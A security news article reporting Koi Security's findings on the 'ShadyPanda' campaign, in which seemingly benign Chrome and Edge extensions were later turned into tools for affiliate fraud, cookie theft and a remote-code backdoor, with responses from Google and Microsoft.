A threat actor has published over a hundred malicious extensions that can track and profile Chrome and Microsoft Edge users, and can also execute a payload on their systems, Koi Security reports.
According to the company, the threat actor, tracked as ShadyPanda, has been uploading seemingly innocuous extensions for roughly seven years, and weaponizing them after gaining users’ trust.
The extensions have gathered over 4 million downloads and some of them remain available for download.
In 2023, as part of a campaign focused on affiliate fraud, ShadyPanda published 20 Chrome extensions under the name ‘nuggetsno15’, and 125 Edge extensions using the name ‘Zhang’.
The extensions were designed to silently inject affiliate tracking codes every time the victim clicked on eBay, Amazon, or Booking.com links.
“Hidden commissions on every purchase. The extensions also deployed Google Analytics tracking to monetize browsing data – every website visit, search query, and click pattern logged and sold,” Koi notes.
In early 2024, the threat actor changed tactics, publishing an extension posing as a tab productivity tool. Named Infinity V+, it redirected web searches through the browser hijacker trovi.com.
Additionally, ShadyPanda used malicious code to read victims’ cookies and send the data to nossl.dergoodting.com, creating unique identifiers without users’ consent or knowledge. The code also captured users’ input in the search box, profiling their interests in real time.
Prior to these campaigns, ShadyPanda had five legitimate extensions uploaded to the official store, including three published between 2018 and 2019.
All gained ‘Featured’ and ‘Verified’ statuses from Google, before the threat actor weaponized them with a malicious update in mid-2024. One of them, Clean Master, had more than 300,000 installs.
The update essentially transformed the extensions into a remote code execution framework, Koi says. Every hour, the extensions would check an external server for instructions and execute arbitrary JavaScript code, with full browser API access.
“This isn’t malware with a fixed function. It’s a backdoor. ShadyPanda decides what it does. Today it’s surveillance, tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, hourly, forever,” Koi says.
Koi observed the extensions executing a payload designed to exfiltrate browser data to remote servers. It was caught collecting visited URLs, HTTP referrers, timestamps, persistent UUID4 identifiers, and complete browser fingerprints, and encrypting all data before exfiltration.
In 2023, Clean Master for Edge’s publisher, Starlab Technology, uploaded to the Edge marketplace five other extensions, including two that are ‘comprehensive spyware’, according to Koi.
One of these extensions, named WeTab New Tab Page, has over three million downloads. While posing as a productivity tool, it operates as a sophisticated surveillance platform, sending user data to 17 different domains, Koi says.
The cybersecurity firm says it linked the campaigns based on code similarities, overlapping infrastructure, and the observed obfuscation techniques, which have evolved over time.
A Google spokesperson has confirmed that the malicious extensions are not available on the Chrome Web Store.
Responding to a SecurityWeek inquiry, a Microsoft spokesperson said the company was not notified about the issue.
“We have removed all the extensions identified as malicious on Edge Add-on store. When we become aware of instances that violate our policies, we take appropriate action that includes, but is not limited to, the removal of prohibited content or termination of our publishing agreement,” the company’s representative said.
*Updated with information from Google and Microsoft.
Related: New Firefox Extensions Required to Disclose Data Collection Practices
Related: Browser Extensions Pose Serious Threat to Gen-AI Tools Handling Sensitive Data
Related: Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign
Related: Several Chrome Extensions Compromised in Supply Chain Attack
